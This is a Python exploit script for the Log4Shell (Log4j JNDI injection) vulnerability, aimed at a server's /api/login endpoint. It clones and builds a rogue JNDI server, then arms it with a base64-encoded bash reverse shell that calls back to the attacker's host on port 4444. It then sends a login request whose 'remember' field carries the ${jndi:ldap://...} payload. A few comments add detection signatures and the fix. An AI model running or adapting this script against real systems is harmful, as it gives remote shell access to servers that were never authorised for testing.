import requests
import base64
import subprocess
import argparse
import multiprocessing
import time
# Command-line interface. All three options are plain strings with no default,
# so an omitted option is simply None when read below. Besides Java and Maven,
# the script also shells out to git (see git() / setupserver()).
parser = argparse.ArgumentParser(description="Requirements: Java and Maven installed")
parser.add_argument("--host", help="The IP which is hosting the rogue jndi server")
parser.add_argument("--target", help="The IP of the target server")
parser.add_argument("--port", help="The port of the target server running the service")
args = parser.parse_args()
# Disabling the no HTTPS certificate warning, remove if needed
# (this only silences the warning; the request in runexploit() is sent with
# verify=False, so certificate validation itself is already skipped).
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
def git(*args):
    """Invoke ``git`` with *args* as its argument list and return its exit status.

    ``args`` here is the function's own varargs tuple; it shadows the
    module-level parsed ``args`` only inside this body.
    """
    argv = ['git', *args]
    return subprocess.call(argv)
def setupserver():
    """Fetch, build and run the external rogue-jndi server in the foreground.

    Looks for a ``rogue-jndi`` entry in the current directory's listing;
    clones the project and runs ``mvn package`` when it is absent. Then
    launches the built jar with a ``--command`` that decodes and runs a bash
    reverse shell back to ``args.host`` on port 4444. Blocks for as long as
    the Java process lives (check_call), so the caller runs it in its own
    process.
    """
    # Presence test is a raw `ls` of the cwd, so it only sees a clone that
    # lives in the directory the script is launched from.
    directory_contents = subprocess.run("ls", stdout=subprocess.PIPE, text=True).stdout.split('\n')
    if ('rogue-jndi' not in directory_contents):
        git("clone", "https://github.com/veracode-research/rogue-jndi")
        subprocess.check_call("mvn -f rogue-jndi package".split(' '))
    else:
        print('rogue-jndi ALREADY INSTALLED')
    # Reverse-shell command, base64-encoded here and decoded on the target by
    # the `{base64,-d}` stage of the --command string below.
    command = str(base64.b64encode(b'bash -c "bash -i >& /dev/tcp/'+bytes(args.host, 'utf-8')+b'/4444 0>&1"'), 'utf-8')
    print('Starting server ...')
    # The jar's internals are not visible here; presumably it answers the LDAP
    # lookup that runexploit() triggers on the target (payload points at
    # args.host:1389) with a reference that runs --command.
    commands = ['java','-jar','rogue-jndi/target/RogueJndi-1.1.jar','--command','"bash -c {echo,'+command+'}|{base64,-d}|{bash,-i}"','--hostname',args.host]
    print('------------------')
    print(commands)
    print('------------------')
    # Defender note: on the victim side the observable footprint is an
    # application server opening an outbound LDAP connection to an unexpected
    # host, followed by a bash /dev/tcp egress to that host on port 4444.
    subprocess.check_call(commands)
    #subprocess.check_call(commands,stdout=subprocess.DEVNULL,stderr=subprocess.STDOUT)
def runexploit():
    """Send one HTTPS login request whose JSON body carries a JNDI lookup string.

    The ``remember`` field is set to ``${jndi:ldap://<args.host>:1389/o=tomcat}``;
    on a vulnerable Log4j 2 deployment the logger resolves that string by
    contacting ``args.host`` over LDAP. TLS verification is disabled
    (``verify=False``) and the raw response body is printed.
    """
    headers = {
        'Host': f'{args.target}:{args.port}',
        'Origin': f'https://{args.target}:{args.port}',
        #'Content-Length': '104',
        'Content-Type': 'application/json',
    }
    # Defender note: the literal `${jndi:ldap://` substring inside a request
    # body (here a login form field that ends up logged) is the signature to
    # alert on. Body/WAF filtering is defence in depth only; the durable fix is
    # a Log4j 2 release that no longer performs message-lookup substitution.
    payload = '${jndi:ldap://'+ args.host +':1389/o=tomcat}'
    # Body is built by string concatenation rather than json.dumps, so the
    # payload is inserted verbatim with no JSON escaping.
    data = '{"username":"a","password":"a","remember":"'+payload+'","strict":true}'
    print('Making the request...')
    response = requests.post(f'https://{args.target}:{args.port}/api/login', headers=headers, data=data, verify=False)
    print('Response:',response.content)
if __name__=='__main__':
    # Two processes because setupserver() blocks in check_call for the
    # server's lifetime: the server is started first, the script sleeps a
    # fixed 5 s, then the request process is started. Neither process is
    # joined, so the parent simply returns after starting the second one.
    process1 = multiprocessing.Process(target=setupserver)
    process2 = multiprocessing.Process(target=runexploit)
    process1.start()
    time.sleep(5)
    process2.start()